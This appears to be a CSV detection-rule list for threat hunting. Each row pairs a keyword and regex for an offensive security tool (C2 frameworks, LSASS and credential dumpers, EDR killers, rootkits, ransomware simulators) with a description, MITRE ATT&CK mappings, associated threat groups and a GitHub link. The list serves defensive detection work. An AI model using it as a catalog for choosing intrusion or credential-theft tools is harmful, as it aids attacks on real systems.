"*byt3bl33d3r/dnschef-ng*",".{0,1000}byt3bl33d3r\/dnschef\-ng.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","36516"
"*byt3bl33d3r/gcat*",".{0,1000}byt3bl33d3r\/gcat.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","36517"
"*byt3bl33d3r/ItWasAllADream*",".{0,1000}byt3bl33d3r\/ItWasAllADream.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","N/A","7","8","796","123","2024-05-19T16:25:52Z","2021-07-05T20:13:49Z","36518"
"*byt3bl33d3r/NimDllSideload*",".{0,1000}byt3bl33d3r\/NimDllSideload.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","36519"
"*byt3bl33d3r/pth-toolkit*",".{0,1000}byt3bl33d3r\/pth\-toolkit.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36520"
"*byt3bl33d3r/pth-toolkit*",".{0,1000}byt3bl33d3r\/pth\-toolkit.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","36521"
"*byt3bl33d3r/SpamChannel*",".{0,1000}byt3bl33d3r\/SpamChannel.{0,1000}","offensive_tool_keyword","SpamChannel","poof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","N/A","8","4","335","36","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z","36522"
"*byt3bl33d3r/SprayingToolkit*",".{0,1000}byt3bl33d3r\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","36523"
"*byt3bl33d3r@pm.me*",".{0,1000}byt3bl33d3r\@pm\.me.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","#email","N/A","8","2","153","14","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z","36524"
"*bytecode77/r77-rootkit*",".{0,1000}bytecode77\/r77\-rootkit.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","1","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","36525"
"*-c /tmp/redsocks.conf*",".{0,1000}\-c\s\/tmp\/redsocks\.conf.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","36526"
"*-c 854A20FB-2D44-457D-992F-EF13785D2B51*",".{0,1000}\-c\s854A20FB\-2D44\-457D\-992F\-EF13785D2B51.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","36527"
"*-c BOF.cpp -o BOF.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","36528"
"*-c BOF.cpp -o BOF.x64.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","36529"
"*-c credentialmanager.c -o credentialmanager.o*",".{0,1000}\-c\scredentialmanager\.c\s\-o\scredentialmanager\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36530"
"*-c modifiableautorun.c -o modifiableautorun.o*",".{0,1000}\-c\smodifiableautorun\.c\s\-o\smodifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36531"
"*-c tokenprivileges.c -o tokenprivileges.o*",".{0,1000}\-c\stokenprivileges\.c\s\-o\stokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36532"
"*-c unquotedsvcpath.c -o unquotedsvcpath.o*",".{0,1000}\-c\sunquotedsvcpath\.c\s\-o\sunquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","36533"
"*C$\\Windows\\System32\\CodeIntegrity\\SiPolicy.p7b*",".{0,1000}C\$\\\\Windows\\\\System32\\\\CodeIntegrity\\\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","36534"
"*C$\Windows\System32\CodeIntegrity\SiPolicy.p7b*",".{0,1000}C\$\\Windows\\System32\\CodeIntegrity\\SiPolicy\.p7b.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","36535"
"*C&C => *",".{0,1000}C\&C\s\=\>\s.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","36536"
"*c:/chaos-container:/database/*",".{0,1000}c\:\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","36538"
"*c:/users/public/creds.log*",".{0,1000}c\:\/users\/public\/creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","36539"
"*c:\\com-test\\v2\\*",".{0,1000}c\:\\\\com\-test\\\\v2\\\\.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36541"
"*c:\\echo_driver.sys*",".{0,1000}c\:\\\\echo_driver\.sys.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","36542"
"*C:\\SPRAY_*.dmp*",".{0,1000}C\:\\\\SPRAY_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","36543"
"*C:\\temp\\debug.dmp*",".{0,1000}C\:\\\\temp\\\\debug\.dmp.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","36544"
"*C:\\temp\\test.txt*",".{0,1000}C\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","36545"
"*C:\\temp\\testlog\\mylogdddd.blf.blf*",".{0,1000}C\:\\\\temp\\\\testlog\\\\mylogdddd\.blf\.blf.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","#content","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","36546"
"*C:\\Users\\{username}\\AppData\\Local\\CoreAIPlatform.00\\UKP*",".{0,1000}C\:\\\\Users\\\\\{username\}\\\\AppData\\\\Local\\\\CoreAIPlatform\.00\\\\UKP.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","script content","5","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","36547"
"*C:\\Users\\DARKN3T\\Downloads*",".{0,1000}C\:\\\\Users\\\\DARKN3T\\\\Downloads.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","36548"
"*C:\\Users\\L.Ackerman=*",".{0,1000}C\:\\\\Users\\\\L\.Ackerman\=.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","36549"
"*C:\\Users\\Public\\callback.el*",".{0,1000}C\:\\\\Users\\\\Public\\\\callback\.el.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","36550"
"*C:\\Users\\Public\\example.txt*",".{0,1000}C\:\\\\Users\\\\Public\\\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","36551"
"*C:\\Users\\Public\\Windows\\Ui\\*",".{0,1000}C\:\\\\Users\\\\Public\\\\Windows\\\\Ui\\\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","36552"
"*C:\\windows\\temp\\Coredump.dmp*",".{0,1000}C\:\\\\windows\\\\temp\\\\Coredump\.dmp.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","36553"
"*C:\\windows\\temp\\sam*",".{0,1000}C\:\\\\windows\\\\temp\\\\sam.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","36554"
"*c:\\windows\\temp\\test1.txt*",".{0,1000}c\:\\\\windows\\\\temp\\\\test1\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36555"
"*c:\\windows\\temp\\test2.txt*",".{0,1000}c\:\\\\windows\\\\temp\\\\test2\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36556"
"*c:\\windows\\temp\\test3.txt*",".{0,1000}c\:\\\\windows\\\\temp\\\\test3\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36557"
"*c:\__output*",".{0,1000}c\:\\__output.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","36558"
"*c:\123.txt*",".{0,1000}c\:\\123\.txt.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","36559"
"*C:\aab.txt*",".{0,1000}C\:\\aab\.txt.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","36560"
"*c:\agent.exe*",".{0,1000}c\:\\agent\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","36561"
"*C:\ASEC.log*",".{0,1000}C\:\\ASEC\.log.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36562"
"*c:\com-test\v2\*",".{0,1000}c\:\\com\-test\\v2\\.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36563"
"*C:\dir2.bat*",".{0,1000}C\:\\dir2\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36565"
"*C:\dir4.bat*",".{0,1000}C\:\\dir4\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36566"
"*C:\dir5.bat*",".{0,1000}C\:\\dir5\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36567"
"*C:\dir6.bat*",".{0,1000}C\:\\dir6\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36568"
"*C:\dir7.bat*",".{0,1000}C\:\\dir7\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script names used by Dispossessor ransomware group executed by dir_start.bat","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36569"
"*C:\dsc_hello.txt*",".{0,1000}C\:\\dsc_hello\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","0","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","36570"
"*C:\kernel.dmp*",".{0,1000}C\:\\kernel\.dmp.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A","36571"
